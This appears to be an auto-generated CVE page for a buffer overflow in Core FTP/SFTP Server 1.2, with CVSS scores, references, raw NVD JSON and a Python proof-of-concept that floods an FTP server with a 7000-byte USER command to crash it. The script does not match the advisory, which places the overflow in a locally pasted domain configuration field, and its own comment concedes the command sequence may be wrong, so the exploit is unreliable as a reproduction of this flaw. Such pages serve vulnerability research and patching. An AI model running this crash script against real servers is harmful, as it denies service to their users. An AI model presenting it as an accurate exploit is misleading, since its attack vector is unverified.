Security Vulnerability Report
CVE-2019-25654 CVSS 7.5 HIGH

CVE-2019-25654

Published: 2026-03-30 12:16:18
Last Modified: 2026-04-08 16:18:04

Description

Core FTP/SFTP Server 1.2 contains a buffer overflow vulnerability that allows attackers to crash the service by supplying an excessively long string in the User domain field. Attackers can paste a malicious payload containing 7000 bytes of data into the domain configuration to trigger an application crash and deny service.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:coreftp:core_ftp:1.2:*:*:*:*:*:*:* - VULNERABLE
Core FTP/SFTP Server 1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# Target settings
TARGET_IP = "192.168.1.10"
TARGET_PORT = 21

# Generate payload: 7000 bytes of 'A'
payload = b"A" * 7000

try:
    # Establish connection
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TARGET_IP, TARGET_PORT))
    print(f"[+] Connected to {TARGET_IP}")

    # Receive server banner
    s.recv(1024)

    # Send malicious payload to trigger buffer overflow in User domain field
    # Note: The exact command sequence may vary based on specific implementation
    s.send(b"USER " + payload + b"\r\n")
    print("[+] Payload sent, checking if service crashed...")

    # Clean up
    s.close()
except Exception as e:
    print(f"[-] An error occurred: {e}")
```

References

http://www.coreftp.com/ - Product
http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe - Product
https://www.exploit-db.com/exploits/46371 - Exploit, VDB Entry
https://www.vulncheck.com/advisories/core-ftp-sftp-server-denial-of-service-via-buffer-overflow - Third Party Advisory

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25654", "sourceIdentifier": "[email protected]", "published": "2026-03-30T12:16:18.150", "lastModified": "2026-04-08T16:18:03.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Core FTP/SFTP Server 1.2 contains a buffer overflow vulnerability that allows attackers to crash the service by supplying an excessively long string in the User domain field. Attackers can paste a malicious payload containing 7000 bytes of data into the domain configuration to trigger an application crash and deny service."}, {"lang": "es", "value": "Servidor Core FTP/SFTP 1.2 contiene una vulnerabilidad de desbordamiento de búfer que permite a los atacantes bloquear el servicio al proporcionar una cadena excesivamente larga en el campo de dominio de Usuario. Los atacantes pueden pegar una carga útil maliciosa que contiene 7000 bytes de datos en la configuración del dominio para desencadenar un bloqueo de la aplicación y denegar el servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:coreftp:core_ftp:1.2:*:*:*:*:*:*:*", "matchCriteriaId": "5D1897D5-4E23-4D27-B0BC-08E3DF8F18CE"}]}]}], "references": [{"url": "http://www.coreftp.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46371", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/core-ftp-sftp-server-denial-of-service-via-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}